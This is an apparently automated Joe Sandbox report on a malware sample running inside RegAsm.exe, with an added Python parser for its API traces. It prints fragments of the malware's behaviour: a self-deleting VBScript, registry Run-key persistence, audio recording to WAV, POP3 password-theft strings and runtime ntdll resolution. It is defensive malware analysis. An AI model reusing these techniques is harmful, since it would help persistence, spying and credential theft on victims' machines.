• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$P2$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-1346542981
• Opcode ID: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
• Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
• Opcode Fuzzy Hash: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
• Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
• ExitProcess.KERNEL32 ref: 0040D454
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$On Error Resume Next$P2$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
• API String ID: 3797177996-3777177265
• Opcode ID: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
• Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
• Opcode Fuzzy Hash: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
• Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,8)3,00000003), ref: 004124CF
• ExitProcess.KERNEL32(00000000), ref: 004124DB
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
• CloseHandle.KERNEL32(00000000), ref: 00412576
• GetCurrentProcessId.KERNEL32 ref: 0041257C
• PathFileExistsW.SHLWAPI(?), ref: 004125AD
• GetTempPathW.KERNEL32(00000104,?), ref: 00412610
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
• lstrcatW.KERNEL32(?,.exe), ref: 0041263C
  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
• Sleep.KERNEL32(000001F4), ref: 004126BD
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
• CloseHandle.KERNEL32(00000000), ref: 004126E4
• GetCurrentProcessId.KERNEL32 ref: 004126EA
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
• String ID: .exe$8)3$P2$WDH$exepath$open$temp_
• API String ID: 2649220323-493282040
• Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
• Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
• Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
• Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
• PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
• SetEvent.KERNEL32 ref: 0041B2AA
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
• CloseHandle.KERNEL32 ref: 0041B2CB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
Strings
Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                                  • API String ID: 738084811-2094122233
                                                                                                                                  • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                                                                  • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Write$Create
                                                                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                                                                  • API String ID: 1602526932-4212202414
                                                                                                                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                                                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                  • API String ID: 1646373207-255920310
                                                                                                                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                                                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
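Added example, not part of the Joe Sandbox report: a small Python parser for the `• Func.MODULE(args), ref: ADDR` trace lines printed in these function blocks, run over two of the RegAsm.exe functions above. For the WriteFile run it checks that the thirteen byte counts (4,4,4,4,4,2,2,4,4,2,2,4,4) and the four resolved tags (RIFF, WAVE, "fmt ", data) line up with the canonical 44-byte RIFF/WAVE header, and reports each field's offset; for the GetModuleHandleW/GetProcAddress run it lists the ntdll exports that are looked up by name at run time. The embedded trace lines are copied from this report; the field names follow the WAV format, the Nt/Zw/Rtl/Ldr prefix test is my own heuristic, and `build_wav_header` is my reference writer assuming a PCM header (AudioFormat 1), a value the report's trace does not show.

```python
"""Added example (not from the Joe Sandbox report): parse the report's API
trace lines and recognise two patterns from the RegAsm.exe blocks above."""
import re
import struct
from dataclasses import dataclass

# Constructed input: trace lines copied verbatim from the function blocks above.
SAMPLE_TRACE = """
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
• WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
• WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
• WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
• GetProcAddress.KERNEL32(00000000), ref: 004072E0
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
• GetProcAddress.KERNEL32(00000000), ref: 00407308
"""

# "• Func.MODULE(arg,arg,...), ref: 0041B2AA"; the argument list is optional
# ("• SetEvent.KERNEL32 ref: 0041B2AA") and may itself contain ')'.
LINE_RE = re.compile(
    r"(?P<func>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")


@dataclass
class Call:
    func: str
    module: str
    args: list
    ref: int


def parse_trace(text):
    """One Call per trace line; other lines (headings, hashes) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            raw = m.group("args")
            args = raw.split(",") if raw else []   # no strip(): the "fmt " tag ends in a space
            calls.append(Call(m.group("func"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def _hex(s):
    try:
        return int(s, 16)
    except ValueError:
        return None          # '?' or a resolved string, not a number


# Canonical 44-byte RIFF/WAVE header: (field, byte count, tag literal or None).
WAV_HEADER = (
    ("ChunkID", 4, "RIFF"), ("ChunkSize", 4, None), ("Format", 4, "WAVE"),
    ("Subchunk1ID", 4, "fmt "), ("Subchunk1Size", 4, None), ("AudioFormat", 2, None),
    ("NumChannels", 2, None), ("SampleRate", 4, None), ("ByteRate", 4, None),
    ("BlockAlign", 2, None), ("BitsPerSample", 2, None), ("Subchunk2ID", 4, "data"),
    ("Subchunk2Size", 4, None),
)


def find_wav_header_writes(calls):
    """Match a run of WriteFile calls against WAV_HEADER by byte count (3rd
    argument) and by the four tags the report resolved (2nd argument).
    WriteFile's 2nd parameter is a buffer pointer; where the report could
    not read the pointee it prints '?' or the raw address, so only the tag
    slots are compared.  Returns [(field, offset, size)] or None."""
    writes = [c for c in calls if c.func == "WriteFile"]
    for start in range(len(writes) - len(WAV_HEADER) + 1):
        fields, offset = [], 0
        for c, (name, size, literal) in zip(writes[start:], WAV_HEADER):
            if len(c.args) < 3 or _hex(c.args[2]) != size:
                break
            if literal is not None and c.args[1] != literal:
                break
            fields.append((name, offset, size))
            offset += size
        else:
            return fields
    return None


def build_wav_header(channels, sample_rate, bits, data_len):
    """Reference writer (assumption: PCM, AudioFormat 1): the 44 bytes those
    thirteen WriteFile calls lay down, as a single struct.pack."""
    block_align = channels * bits // 8
    return struct.pack("<4sI4s4sIHHIIHH4sI", b"RIFF", 36 + data_len, b"WAVE", b"fmt ", 16,
                       1, channels, sample_rate, sample_rate * block_align, block_align, bits,
                       b"data", data_len)


NT_EXPORT = re.compile(r"^(Nt|Zw|Rtl|Ldr)[A-Z]\w*$")   # heuristic, not exhaustive


def resolved_ntdll_exports(calls):
    """Export names passed alongside 'ntdll.dll' to GetModuleHandle*/GetProcAddress:
    resolved at run time, hence absent from the PE import table."""
    names = set()
    for c in calls:
        if c.func.startswith(("GetModuleHandle", "GetProcAddress")) \
                and "ntdll.dll" in (a.lower() for a in c.args):
            names.update(a for a in c.args if NT_EXPORT.match(a))
    return sorted(names)


if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for name, off, size in find_wav_header_writes(calls) or []:
        print(f"{off:2d} +{size} {name}")
    print("ntdll exports resolved by name:", resolved_ntdll_exports(calls))
```

The same parser accepts the other trace blocks on this page (the mciSendString, CreateDirectoryW/CopyFileW and FindFirstVolumeW functions), so it can be pointed at a whole report dump; only the two pattern checks are specific to the functions shown here.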
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strlen
                                                                                                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                  • API String ID: 4218353326-3023110444
                                                                                                                                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                  • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                  • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,8)3,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                                                  • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                                                  • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                                                  • _wcslen.LIBCMT ref: 0040D001
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                                                  • CloseHandle.KERNEL32 ref: 0040D068
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                  • String ID: 6$8)3$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                                                                  • API String ID: 1579085052-1375072388
                                                                                                                                  • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                                                                  • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                                                                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 3941738427-1684325040
                                                                                                                                  • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                                                  • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strlen
                                                                                                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                  • API String ID: 4218353326-230879103
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$EnvironmentVariable
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1464849758-0
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEnumOpen
                                                                                                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                  • API String ID: 1332880857-3714951968
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
